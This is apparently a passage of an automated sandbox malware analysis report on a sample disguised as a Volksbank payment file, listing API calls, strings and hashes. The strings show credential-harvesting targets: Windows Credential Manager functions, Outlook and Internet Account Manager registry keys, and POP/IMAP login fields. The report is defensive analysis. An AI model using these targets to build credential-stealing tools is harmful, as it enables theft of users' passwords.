• Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
APIs
• _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 714388716-318151290
• Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
• Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
• Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
• Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                                            • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040CC0B
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
• String ID:
• API String ID: 1416211542-0
APIs
Strings
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 2360744853-2229823034
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• memset.MSVCRT ref: 00402C9D
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?), ref: 00402D9F
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• memset.MSVCRT ref: 00402CF7
• sprintf.MSVCRT ref: 00402D10
• sprintf.MSVCRT ref: 00402D4E
  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
Strings
Similarity
• API ID: Closememset$sprintf$EnumOpen
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
• API String ID: 1831126014-3814494228
APIs
• strchr.MSVCRT ref: 004100E4
• _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
• _mbscat.MSVCRT ref: 0041014D
• memset.MSVCRT ref: 00410129
  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
• memset.MSVCRT ref: 00410171
• memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
• _mbscat.MSVCRT ref: 00410197
Strings
Similarity
• API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 912701516-1821301763
APIs
Strings
Similarity
• API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
• String ID: 0$6
• API String ID: 3540791495-3849865405
APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
• memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
• CoTaskMemFree.COMBASE(00000000), ref: 00410970
Strings
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                          • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                          • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                          • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                          • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$strlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                          • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                          • API String ID: 3318079752-260894208
                                                                                                                                                                                                                                          • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll,76940A60,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404AB8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404ADE
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
• Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
• FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
• strlen.MSVCRT ref: 00406CCC
• _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
• LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
• _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2881943006-572158859
• Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
• Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
• Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
• Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
APIs
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
• _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
• GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
• Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
• Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
• Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
• Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
APIs
Strings
• cannot ATTACH database within transaction, xrefs: 0042E966
• out of memory, xrefs: 0042EBEF
• unable to open database: %s, xrefs: 0042EBD6
• attached databases must use the same text encoding as main database, xrefs: 0042EAE6
• too many attached databases - max %d, xrefs: 0042E951
• database %s is already in use, xrefs: 0042E9CE
• database is already attached, xrefs: 0042EA97
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
• Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
• Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
• Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
APIs
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,76940A60,?,00000000), ref: 00409C53
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,76940A60,?,00000000), ref: 00409C6F
• memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,76940A60), ref: 00409C97
• memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,76940A60), ref: 00409CB4
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D3D
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D47
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D7F
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
• String ID: 0wE$d
• API String ID: 2915808112-1552800882
• Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
• Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
• Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
• Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
APIs
  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
• strchr.MSVCRT ref: 0040327B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
• Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
• Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                                                            • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                                                            • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
